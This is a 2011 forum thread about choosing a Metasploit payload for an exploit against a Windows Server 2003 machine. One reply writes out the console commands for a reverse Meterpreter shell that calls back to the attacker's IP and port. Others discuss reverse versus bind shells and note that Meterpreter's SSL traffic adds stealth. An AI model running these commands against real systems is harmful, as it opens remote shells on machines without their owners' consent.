|
Title: a question about metasploit Post by: midnight monster on November 11, 2011, 12:58:47 PM Hello there!
i have a problem witn metasploit i dont wich of payloads is best for my exploit ( i know the server vulnerabilite and i sure about my expliot )and when i use "show payloads" command i see a lot of compatible payloads please help me to find the best payload Title: Re: a question about metasploit Post by: mambru on November 11, 2011, 01:08:22 PM The "best" payload to use will depend on you scenario.
http://www.offensive-security.com/metasploit-unleashed/Payload_Types (http://www.offensive-security.com/metasploit-unleashed/Payload_Types) Title: Re: a question about metasploit Post by: 24772433 on November 11, 2011, 03:32:04 PM Try each one and see which works best for you! That's part of the fun of Metasploit. For each one that doesn't work try to find out why!
Steve Title: Re: a question about metasploit Post by: BillV on November 11, 2011, 08:24:07 PM As previously mentioned we don't know your environment, or your target for that matter.
If it's within a local lab environment, targeting a Windows system, give the reverse meterpreter a try... set payload windows/meterpreter/reverse_tcp set lhost <your ip> set lport 8888 exploit Title: Re: a question about metasploit Post by: midnight monster on November 12, 2011, 01:57:19 PM oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me
Title: Re: a question about metasploit Post by: 24772433 on November 12, 2011, 05:08:03 PM oh steve are you kiding!! it has hundred compatible payload and it takes a lot of time for me OK. What is the server OS and vulnerability? If it's Windows then Meterpereter (as mentioned by BILLV) is always a favorite of mine. Steve Title: Re: a question about metasploit Post by: msfsinn3r on November 12, 2011, 05:34:32 PM On Windows, a meterpreter is always better because all windows post modules support it (plus tons of features). It also communicates in SSL, so that adds a bit more stealth. On Linux though, it's a different story, honestly you're probably better off with a non-meterpreter shell, because the Linux meterpreter isn't as good as the windows one.
reverse vs bind... come to think about it, I almost never use bind these days on a machine behind a firewall. But people do use bind shells. By the way, when you select an exploit, and do "show payloads" -- that will only show all the payloads compatible with that particular exploit. If you're testing a web app exploit, keep in mind php/exec might not return an output (even though the command ran successfully). If you're still clueless about which payload to use, just use a reverse meterpreter like everybody else has been recommending. Lastly, perhaps you should consider asking Metasploit questions on #metasploit in freenode, so the actual metasploit dev team can answer your questions more quickly. And yes... I did sign up for an account here just to answer your question. Title: Re: a question about metasploit Post by: midnight monster on November 13, 2011, 12:16:03 AM Thank you msfsinn3r your info was very useful for me
my sever is windows server 2003 and thanks alot Title: Re: a question about metasploit Post by: nytfox on January 29, 2012, 02:50:07 AM btw you can use search commend to get selected exploits , like "search smb" . try it and lemme know :)
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |